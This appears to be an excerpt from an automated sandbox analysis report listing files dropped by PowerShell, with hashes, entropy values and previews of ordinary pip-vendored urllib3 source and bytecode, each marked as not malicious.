                                                                                                                                                                                                            Size (bytes):233
                                                                                                                                                                                                            Entropy (8bit):4.822319076309963
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Qx/qeh/wON95/n23d6xUAreaeHulNXELiRBD4:CQx/qeJwQ/2IsalhRBD4
                                                                                                                                                                                                            MD5:2A2890F15310CEB11415E2C3D746D195
                                                                                                                                                                                                            SHA1:0D967F22C7CEC474CBD24C220449F3FB6595201B
                                                                                                                                                                                                            SHA-256:BA5D5C0FED0A59A094BEA1D9C9AB07F26E496131468E6F88A1F7D16FBA880EBF
                                                                                                                                                                                                            SHA-512:E3328E542DD9AB4052BC478793DA72E6E8B111220CD2EC895DF40AF6408118E34E24EB949F44F1AC9CD22B85484853711578237C48EA6D28A19875E27025AE7E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/urllib3/contrib/_securetransport/__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10729
                                                                                                                                                                                                            Entropy (8bit):6.024244390716781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:cw5DaKskWJDseu/LhugQHDOe3trSqa3FAyrsRsXwaw373ly:cwMKsRSv/91KNWrsyHw3r4
                                                                                                                                                                                                            MD5:DD2202A87BF429B4A4E88328D7416B6E
                                                                                                                                                                                                            SHA1:9B3F690F8719F8998226C51330BE3B67A1D64F9A
                                                                                                                                                                                                            SHA-256:B59E3C4AEC584BFFFC48A28D0752ABD63F2D256032AF9ED391CA41DE81231C11
                                                                                                                                                                                                            SHA-512:EF69473CE16C1808700673B52F684F1144A54F3E12D6AAAE3A7AA0B9E22CC506E67FF405F30C1C7C8734677F5F3021A7E20B61AB48748C9A3C241AAAD1105502
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.D.......................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.....d.k.r>e.d.....e.....d...Z.e.e.e.e...d.......Z.e.d.k.r^e.d.e.d...e.d...f.......d.d...Z.e.d.d...Z e.d.d...Z!e.Z"e.Z#e.Z$e.Z%e.Z&e.Z'e.Z(e.Z)e.Z*e.Z+e.Z,e.e+..Z-e.Z.e.Z/e.e%..Z0e.e&..Z1e.e'..Z2e.e(..Z3e.e)..Z4e.Z5e.Z6e.Z7e.e...Z8e.Z9e.Z:e.e...Z;e.Z<e.Z=e.e...Z>e.Z?e.Z@e.e...ZAe.e...ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZH..z.e0e1e.e9..e.e:..e<e.e=..e>e.e2..g.e jI_Je/e jI_Kg.e jL_Je,e jL_Kg.e jM_Je,e jM_Kg.e jN_Je,e jN_Ke.e0g.e jO_Je8e jO_Ke8g.e jP_Je0e jP_Ke/e.g.e jQ_Je1e jQ_Ke-e8e.e;..g.e jR_Je/e jR_Ke.e.e.e"e.e.e>..g.e jS_Je/e jS_Ke>g.e jT_Je/e jT_Ke0e4e.e2..g.e jU_Je/e jU_Ke.e/eCe.e.e.....ZVe.e/eCe.e...e.e.....ZWeAeVeWg.e jX_Je/e jX_KeAe.e.g.e jY_Je/e jY_KeAe2g.e jZ_Je/e jZ_KeAe-e"g.e j[_Je/e j[_KeAeCg.e j\_Je/e j\_KeAe.e.g.e j]_Je/e j]_KeAg.e j^_Je/e j^_KeAe.e.e.e...g.e j__Je/e j__KeAe.e.e.e...g.e j`_Je/e j`_KeAg.e ja_Je/e ja_KeAe.e...g.e jb_Je/
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9116
                                                                                                                                                                                                            Entropy (8bit):5.518232340921389
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CP2psfZYopy/ol0JjQlbf2QtfH/fAeX28f5i+GIjnmGSRWn6httTnY+:CmGZYMy/QEUJbt34C28xi+GIjnmGSRWM
                                                                                                                                                                                                            MD5:4A0F3F5E9C8C6C2DB5AB8F385A2F2D63
                                                                                                                                                                                                            SHA1:9E178441922376E7660F6E8DEDFEE78F2AFD7765
                                                                                                                                                                                                            SHA-256:34E0D04ECD65C8F294AE5F68A34BD7CD8F98C58FECA3D50F0CAF4A21964BDC63
                                                                                                                                                                                                            SHA-512:898E5A9A85EADD0BE55F7FE7548240974D5D48540BDE27D632AC86C2FCAC55721E189A5EF7936610355BFF3F7B5FF38EE565F9318B10DB7B8F8FD47F284C54D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gb6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...e...d.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d&d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d d!d"d#..Z.d$d%..Z.d.S.)'a.....Low-level helpers for the SecureTransport bindings...These are Python functions that are not directly related to the high-level APIs.but are necessary to get them to work. They include a whole bunch of low-level.CoreFoundation messing about and memory management. The concerns in this module.are almost entirely about trying to avoid memory leaks and providing.appropriate and useful assistance to the higher-level code.......N.....)...CFConst..CoreFoundation..Securitys;...-----BEGIN CERTIFICATE-----.(.*?).-----END CERTIFICATE-----c....................C...s....t...t.j.|.t.|.....S.).zv. Given a bytestring, create a CFData object from it. This CFData object must. be CFReleased by the caller.. ).r......CFDa
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17632
                                                                                                                                                                                                            Entropy (8bit):5.132504932203681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:wu/LhugQHDxJh4TH/WBO6VcdMFM4cF+V2AKkAK66qOQK+mx:1/91KxJyHuGGaW1V6hQD
                                                                                                                                                                                                            MD5:6661DE51E1663A18B4B84CD03F030D82
                                                                                                                                                                                                            SHA1:5DC00F4748144A2C049D1F67C1EC16C18A66F9A6
                                                                                                                                                                                                            SHA-256:E1793AE2A2243C1B74F40E6AF9120552E0E135CF665E29556A99BB5A7627CD1C
                                                                                                                                                                                                            SHA-512:558CB4BC7F8FF71985BC799B4A022C3DEB07B570278AF7DE4BA7D5FB027E9C7FF28277FC68A9939B8B3413942DD6DEEC614AAFA7554A9F19AF99A85B1734D6B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".This module uses ctypes to bind a whole bunch of functions and constants from.SecureTransport. The goal here is to provide the low-level API to.SecureTransport. These are essentially the C-level functions and constants, and.they're pretty gross to work with...This code is a bastardised version of the code found in Will Bond's oscrypto.library. An enormous debt is owed to him for blazing this trail for us. For.that reason, this code should be considered to be covered both by urllib3's.license and by oscrypto's:.. Copyright (c) 2015-2016 Will Bond <will@wbond.net>.. Permission is hereby granted, free of charge, to any person obtaining a. copy of this software and associated documentation files (the "Software"),. to deal in the Software without restriction, including without limitation. the rights to use, copy, modify, merge, publish, distribute, sublicense,. and/or sell copies of the Software, and to permit persons to whom the. Software is furnished to do so, sub
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13922
                                                                                                                                                                                                            Entropy (8bit):4.614058756283462
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4I5Kn8neLI5vXq2J+KUHEgsm6eDhmaRwJtLTc+Wn6Jz4:angeLoiKUHEgsm6eDhma/qE
                                                                                                                                                                                                            MD5:C4CF8188919DA124CDCF69982407B298
                                                                                                                                                                                                            SHA1:3E0A4A85C263A1269F8FD9BF290E7DDFC1806FF0
                                                                                                                                                                                                            SHA-256:076241076FCD44FD36C4AE8309AD4F6BD22EC6B3F0C730F365B8B14246FB53D3
                                                                                                                                                                                                            SHA-512:04AFB8BA5B06F9F92E139B5405A1E350A86A5A86D748E9D55599B1D977103B2819AD372C29BBA879F9555A883C798B31B104AE07AFF70BD9F929FD02BBE61933
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".Low-level helpers for the SecureTransport bindings...These are Python functions that are not directly related to the high-level APIs.but are necessary to get them to work. They include a whole bunch of low-level.CoreFoundation messing about and memory management. The concerns in this module.are almost entirely about trying to avoid memory leaks and providing.appropriate and useful assistance to the higher-level code..""".import base64.import ctypes.import itertools.import os.import re.import ssl.import struct.import tempfile..from .bindings import CFConst, CoreFoundation, Security..# This regular expression is used to grab PEM data out of a PEM bundle.._PEM_CERTS_RE = re.compile(. b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL.)...def _cf_data_from_bytes(bytestring):. """. Given a bytestring, create a CFData object from it. This CFData object must. be CFReleased by the caller.. """. return CoreFoundation.CFDataCreate(. CoreFound
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11036
                                                                                                                                                                                                            Entropy (8bit):4.403395833775948
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3vaft8wfh2ACE7U/O0TCGs06jLNf3W435NAbtJEGJab:/4t8wFn4TtnOh3d3Ou/b
                                                                                                                                                                                                            MD5:0039628936CCB81CCF64CA087B7506DD
                                                                                                                                                                                                            SHA1:7AD51EA2742A5DCB5570A366CA554B60E6F2093E
                                                                                                                                                                                                            SHA-256:551EBC780544D77EE5C53823043C029DAE5488165338A6B4D408FFFB905A0B3E
                                                                                                                                                                                                            SHA-512:EB1D3626395D7D7995B07A1B378EBA42106233267997AF42E5A8E64A7A11F26542AF4569AE39F4BA8A23DCB7077521DB98060A8648A274284305287D358F0695
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".This module provides a pool manager that uses Google App Engine's.`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_...Example usage::.. from pip._vendor.urllib3 import PoolManager. from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox.. if is_appengine_sandbox():. # AppEngineManager uses AppEngine's URLFetch API behind the scenes. http = AppEngineManager(). else:. # PoolManager uses a socket-level API behind the scenes. http = PoolManager().. r = http.request('GET', 'https://google.com/')..There are `limitations <https://cloud.google.com/appengine/docs/python/\.urlfetch/#Python_Quotas_and_limits>`_ to the URLFetch service and it may not be.the best choice for your application. There are three options for using.urllib3 on Google App Engine:..1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is. cost-effective in many circumstances as long as your usage is within
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4528
                                                                                                                                                                                                            Entropy (8bit):4.596062511195215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:s5c6hKkqyJzyMoN0roDZnstVnvohq0VKe2Fc:2IYJLodnsrnvohqc2Fc
                                                                                                                                                                                                            MD5:0D2564338CCABD0E3126C771ED288BB0
                                                                                                                                                                                                            SHA1:40648662DB6948A234E567D5F162AFA5CD75CDB9
                                                                                                                                                                                                            SHA-256:3657E45BB58C756F338AAB9DA298C7A16DBDF688350535A2D0878889BAAE1709
                                                                                                                                                                                                            SHA-512:592C23D9350CDF0BAA763C98067581FE4A6204A2E00E96D1560044A04065CBD97B040CF969B5620AA9B4C96E19B552B85D8D8F2CDFD0D647F0584B64E76EA0B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".NTLM authenticating pool, contributed by erikcederstran..Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10.""".from __future__ import absolute_import..import warnings.from logging import getLogger..from ntlm import ntlm..from .. import HTTPSConnectionPool.from ..packages.six.moves.http_client import HTTPSConnection..warnings.warn(. "The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed ". "in urllib3 v2.0 release, urllib3 is not able to support it properly due ". "to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. ". "If you are a user of this module please comment in the mentioned issue.",. DeprecationWarning,.)..log = getLogger(__name__)...class NTLMConnectionPool(HTTPSConnectionPool):. """. Implements an NTLM authentication version of an urllib3 connection pool. """.. scheme = "https".. def __init__(self, user, pw, authurl, *args, **kwargs):. """. authurl is a random URL on
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17081
                                                                                                                                                                                                            Entropy (8bit):4.788716888051959
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uNP6MI83mNk112FOkw+vZKZ78Nu11GWDUGI0iwZzGBrzPwW4Q2kFlrl33hDYmD98:uNCk+k6tw+vYh2uvGUiwdtWxlpt72
                                                                                                                                                                                                            MD5:395256C643FC9A1CC6277ACDA6FDCA81
                                                                                                                                                                                                            SHA1:F33C6754F3AFEAADB1F1E3A8C1CB4A0D1C4911AA
                                                                                                                                                                                                            SHA-256:843261E0C87263FA7EA0A9457187106954110EFE86326046B96F728F1C9E7A33
                                                                                                                                                                                                            SHA-512:631435D1861FA2F012CD3151EE48C03573EA300BC5105DBADC08A9432C808BBEAAD38BCA42330FB6AE275A69991B459E42C6D5A4DA8979603EE73D7B0F906857
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".TLS with SNI_-support for Python 2. Follow these instructions if you would.like to verify TLS certificates in Python 2. Note, the default libraries do.*not* do certificate checking; you need to do additional work to validate.certificates yourself...This needs the following packages installed:..* `pyOpenSSL`_ (tested with 16.0.0).* `cryptography`_ (minimum 1.3.4, from pyopenssl).* `idna`_ (minimum 2.0, from cryptography)..However, pyopenssl depends on cryptography, which depends on idna, so while we.use all three directly here we end up having relatively few packages required...You can install them with the following command:.... code-block:: bash.. $ python -m pip install pyopenssl cryptography idna..To activate certificate checking, call.:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code.before you begin making HTTP requests. This can be done in a ``sitecustomize``.module, or at any other time before your application begins using ``urllib3``,.like this
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34448
                                                                                                                                                                                                            Entropy (8bit):4.636222522598056
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:cIIr2W7SSgjjHsC3tG3+Cfah4h4MS24vUg1IizY:cjJx8c84CMS2C2
                                                                                                                                                                                                            MD5:273B0E5F3E546F507C40E054FB7CDB35
                                                                                                                                                                                                            SHA1:03DF700C2B18E4CA078335AFADB646F1177C7DE8
                                                                                                                                                                                                            SHA-256:CA165D9958D8E8F23A11E15BA7BA983A9EBEBE9D5192FD8D32E3866848FBA667
                                                                                                                                                                                                            SHA-512:80C1153819FD6E5ACA8C278EBA68AA564ACE732D47BDE761D29F36D6FDD9E032109DA603D39607F08251056CD9B3B0F6BF49B9B4F0B5FA0AD2888610CF740C61
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".SecureTranport support for urllib3 via ctypes...This makes platform-native TLS available to urllib3 users on macOS without the.use of a compiler. This is an important feature because the Python Package.Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL.that ships with macOS is not capable of doing TLSv1.2. The only way to resolve.this is to give macOS users an alternative solution to the problem, and that.solution is to use SecureTransport...We use ctypes here because this solution must not require a compiler. That's.because pip is not allowed to require a compiler either...This is not intended to be a seriously long-term solution to this problem..The hope is that PEP 543 will eventually solve this issue for us, at which.point we can retire this contrib module. But in the short term, we need to.solve the impending tire fire that is Python on Mac without this kind of.contrib module. So...here we are...To use this module, simply import and inject it::..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7097
                                                                                                                                                                                                            Entropy (8bit):4.61518223166273
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XojUEqJPKBddnuOSw/f2SxrrP611szEVkgJss:XVEqA1uOJ/f2SBrC11+EyMV
                                                                                                                                                                                                            MD5:1CC7D6AEBA0181CC04CA63F73E21ABF4
                                                                                                                                                                                                            SHA1:3BDE3FD1DC48479B42833C8F7C68B9F57B120B46
                                                                                                                                                                                                            SHA-256:6918BD7965E8F5911BF795D4C5E7F8676D421659E78DB122028F473AC7A832DE
                                                                                                                                                                                                            SHA-512:F8894FAF584D45DF073FC4096582F0A2CFDDC3C92DBD0A9F900EA4F9FF07A7FAC1F6C92836C25CFDAA887BAB999FEE9CF833BAF7C9A52FA853F1BB2CA1D96EAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-.""".This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in. your ``proxy_url`` to ensure that DNS resolution is done from the remote. server instead of client-side when connecting to a domain name...SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5.supports IPv4, IPv6, and domain names...When connecting to a
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8217
                                                                                                                                                                                                            Entropy (8bit):4.735058868407703
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:e/1Sdu/Ds/a6sHyXNuvJ7q5jheEgHZWyj5cVPqCNIHtw6dov+K3x8fOVmmeHOVmm:ww/KfRWWHlcEC+H5dohvmmeHOVmucGK8
                                                                                                                                                                                                            MD5:8E282C0B6583235297A2B8F5D22E36D8
                                                                                                                                                                                                            SHA1:AE0A47792B96E8F918C9CA79E9834F99283D9CF4
                                                                                                                                                                                                            SHA-256:D0C9E7A372874CD7D745F63BEB7F0DB9F38F9146FA9973A6F8BAA3FB8C76C3C0
                                                                                                                                                                                                            SHA-512:F033D4D1C3397807617700A66F49495BAD64B85C0C060931D9FD94537C31F388AF84E3193FFB1718CE9762D54140D2264E8DBC079E373916120FDCE550A622B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..from .packages.six.moves.http_client import IncompleteRead as httplib_IncompleteRead..# Base Exceptions...class HTTPError(Exception):. """Base exception used by this module.""".. pass...class HTTPWarning(Warning):. """Base warning used by this module.""".. pass...class PoolError(HTTPError):. """Base exception for errors caused within a pool.""".. def __init__(self, pool, message):. self.pool = pool. HTTPError.__init__(self, "%s: %s" % (pool, message)).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, None)...class RequestError(PoolError):. """Base exception for PoolErrors that have associated URLs.""".. def __init__(self, pool, url, message):. self.url = url. PoolError.__init__(self, pool, message).. def __reduce__(self):. # For pickling purposes.. return self.__class__, (None, self.url, None)...class SSLError(HTTPError):. """Ra
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8579
                                                                                                                                                                                                            Entropy (8bit):4.579166742309585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nSikc2tLoIP2LRdjIZpN2m17t1KREMtcRG/T7mKBz:nSikJ5Pj+mOEg7mKBz
                                                                                                                                                                                                            MD5:93A2DC0508CF5901177F051F86D71C48
                                                                                                                                                                                                            SHA1:DFA65A499039A4D0FC62F81CE2B41A981C5E0B3E
                                                                                                                                                                                                            SHA-256:92F2C30A0FC9987D652E3514118FC52D2F14858EE106F0CFB951136D8F2676B3
                                                                                                                                                                                                            SHA-512:4BC02537AFD195D360E41DE7C712BE753F75AB79AC7D1FDDE53DEFFFCA15C9475CBC1D716408FFC05EDFDA38DAA8AEC1549AB73FB87B5156BDA278F31C061352
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import email.utils.import mimetypes.import re..from .packages import six...def guess_content_type(filename, default="application/octet-stream"):. """. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. """. if filename:. return mimetypes.guess_type(filename)[0] or default. return default...def format_header_param_rfc2231(name, value):. """. Helper function to format and quote a single header parameter using the. strategy defined in RFC 2231... Particularly useful for header parameters which might contain. non-ASCII values, like file names. This follows. `RFC 2388 Section 4.4 <https://tools.ietf.org/html/rfc2388#section-4.4>`_... :param name:. The name of the parameter, a string expected to be ASCII only.. :param value:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2440
                                                                                                                                                                                                            Entropy (8bit):4.639709442772028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:P5gfyQt55UqO+vYNqs72GZ4l6uhhCj29Bae/zNivW:ayi5FO+Hsxusuhhg2VYW
                                                                                                                                                                                                            MD5:2EA9F2FE3C06A4A560BC1DB53881D209
                                                                                                                                                                                                            SHA1:5D0F199CD76DC0C256C2F6C038DCA67E6B2C8374
                                                                                                                                                                                                            SHA-256:E5BFEAAA04475652FBB8BB5D018073061F861E653901F255B7FD8DD174B73DE6
                                                                                                                                                                                                            SHA-512:BA8BBF4AA0D859D1E74A730164D7345C4E8B393CE88C4646AEEE693A23DF933DB71BB4B0BD2A78F3D6A52AF7D04B79F2D7EABDEC34A83E362935DEEF9B06D857
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import binascii.import codecs.import os.from io import BytesIO..from .fields import RequestField.from .packages import six.from .packages.six import b..writer = codecs.lookup("utf-8")[3]...def choose_boundary():. """. Our embarrassingly-simple replacement for mimetools.choose_boundary.. """. boundary = binascii.hexlify(os.urandom(16)). if not six.PY2:. boundary = boundary.decode("ascii"). return boundary...def iter_field_objects(fields):. """. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... """. if isinstance(fields, dict):. i = six.iteritems(fields). else:. i = iter(fields).. for field in i:. if isinstance(field, RequestField):. yield field. else:. yield RequestField.from_tuples(*field)...def iter_fields(fields):. """. .. deprecated:: 1.6.. Iterate over fields... Th
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):227
                                                                                                                                                                                                            Entropy (8bit):4.840660976475684
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Qx/qeh/w+mu95/n23d6xUAreaeHt3iD4:CQx/qeJw+J/2IsaSyD4
                                                                                                                                                                                                            MD5:529798594D3483B956DBB44A42ADEBD0
                                                                                                                                                                                                            SHA1:CF59C8F9529CDCCF3E9A28EF86E7FC95191D014F
                                                                                                                                                                                                            SHA-256:E1D03F11B676C12B597BF2EFFBE3184A695640BC68C3612C81ECEA97DCF64925
                                                                                                                                                                                                            SHA-512:E824EDA9FB5C1332DBF9D2DD22F6A50003C5B72246DDB8F26E0AA7DBAD329D4F89687E2504266042E93DAE90C42892FA13445F2CCFF5B4B8FDAEF8D380DF0267
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/urllib3/packages/backports/__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1327
                                                                                                                                                                                                            Entropy (8bit):5.704645027461074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9QryECFkpoIJ29/JqmMwJoYBWXM7LdfqTAvKZH30o9uW1ng2Lrmreo1WYEq:9WyEPb29/CwJoqzPdfMAO30UuW1g2PSp
                                                                                                                                                                                                            MD5:53143C0ED6886DBCFC28BDBC0293772D
                                                                                                                                                                                                            SHA1:AB816ACBE98904B7E74C36465FDDB6A64E5874D4
                                                                                                                                                                                                            SHA-256:0969F57D006F265FF65C3B0B26A72BE573F9A8AF63B6FF1044692A8F6B4E619A
                                                                                                                                                                                                            SHA-512:2A70F069A40052576E511DC5BC9320F36630B8696BC63F03AE5FD87D42DB8BF3348012875A0BBBD1B0BAB99BC94B95B953EA0D82D91971675C118004EB4882DB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s(...d.Z.d.d.l.Z.d.d.l.m.Z.....d.d.d...Z.d.S.).z..backports.makefile.~~~~~~~~~~~~~~~~~~..Backports the Python 3 ``socket.makefile`` method for use with anything that.wants to create a "fake" socket object.......N)...SocketIO..rc....................C...s....t.|...h.d...k.s.t.d.|.f.......d.|.v.}.d.|.v.p.|...}.|.s |.s J...d.|.v.}.d.}.|.r,|.d.7.}.|.r2|.d.7.}.t.|.|...}.|...j.d.7..._.|.d.u.rDd.}.|.d.k.rKt.j.}.|.d.k.rW|.sUt.d.....|.S.|.rc|.rct...|.|.|...}.n.|.rlt...|.|...}.n.|.spJ...t...|.|...}.|.rz|.S.t...|.|.|.|...}.|.|._.|.S.).z:. Backport of ``socket.makefile`` from Python 3.5.. >....r......b..wz&invalid mode %r (only r, w, b allowed)r....r....r...........N.....r....z!unbuffered streams must be binary)...set..ValueErrorr....Z._makefile_refs..io..DEFAULT_BUFFER_SIZE..BufferedRWPair..BufferedReader..BufferedWriter..TextIOWrapper..mode)...selfr......buffering..encoding..errors..newline..writing..reading..binary..rawmode..raw..buffer..text..r....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1417
                                                                                                                                                                                                            Entropy (8bit):4.612780318160635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ldryECFkyumlAs0C7a5JXrwszMd2kTiJar6CbDmlVLQ2LZLQHLQS1uH:ryEAQC7aPwsSTEarf3mly2SckuH
                                                                                                                                                                                                            MD5:D26B39C4287D4132D46935C8E0B2E169
                                                                                                                                                                                                            SHA1:DF04CDFC410623DE6479AF9FCB007388CFB9AA9E
                                                                                                                                                                                                            SHA-256:9DBCEDDE2D1A80F54FD3B8EAAA08E16988CC9AE022FD6E44D04CB0662BD53BC1
                                                                                                                                                                                                            SHA-512:0B1EBBA9DA250FF2CD7A3E6BCFF311DD1625D3BC0569463B5B6F549DB88361B9523C09DC67BDEFFE048BAB1E6E5DFC096BD5C8372D3EDE0D58D21372920326B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
